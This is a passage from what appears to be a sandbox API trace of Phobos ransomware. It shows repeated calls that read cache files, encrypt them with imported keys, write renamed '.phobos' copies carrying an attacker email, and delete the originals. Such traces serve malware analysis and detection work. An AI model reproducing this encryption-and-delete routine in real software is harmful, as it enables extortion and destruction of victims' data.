halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.044] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.044] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.044] ReadFile (in: hFile=0x168, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x186, lpOverlapped=0x0) returned 1 [0198.045] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.045] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.046] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.046] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.046] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.046] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.046] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.046] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.046] CloseHandle (hObject=0x168) returned 1 [0198.046] CloseHandle (hObject=0xac) returned 1 [0198.046] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e")) returned 1 [0198.047] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.048] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=386) returned 1 [0198.048] CloseHandle (hObject=0xac) returned 1 [0198.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30")) returned 0x2024 [0198.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.048] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.048] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.049] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.049] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.049] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x182, lpOverlapped=0x0) returned 1 [0198.050] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.050] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.051] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.051] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.051] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.051] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.051] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.052] CloseHandle (hObject=0xac) returned 1 [0198.052] CloseHandle (hObject=0x168) returned 1 [0198.052] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30")) returned 1 [0198.052] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.053] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=390) returned 1 [0198.053] CloseHandle (hObject=0x168) returned 1 [0198.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb")) returned 0x2024 [0198.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.054] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.054] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.054] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.054] ReadFile (in: hFile=0x168, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x186, lpOverlapped=0x0) returned 1 [0198.056] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.056] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.057] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.057] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.057] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.057] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.057] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.057] CloseHandle (hObject=0x168) returned 1 [0198.057] CloseHandle (hObject=0xac) returned 1 [0198.057] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb")) returned 1 [0198.058] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.059] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=384) returned 1 [0198.059] CloseHandle (hObject=0xac) returned 1 [0198.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56")) returned 0x2024 [0198.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.059] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.059] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.060] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.060] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.060] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x180, lpOverlapped=0x0) returned 1 [0198.061] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.061] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.063] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.063] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.063] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.063] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.063] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.063] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.063] CloseHandle (hObject=0xac) returned 1 [0198.063] CloseHandle (hObject=0x168) returned 1 [0198.063] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56")) returned 1 [0198.064] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.065] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=392) returned 1 [0198.065] CloseHandle (hObject=0x168) returned 1 [0198.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f")) returned 0x2024 [0198.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.071] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.072] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.072] CryptSetKeyParam 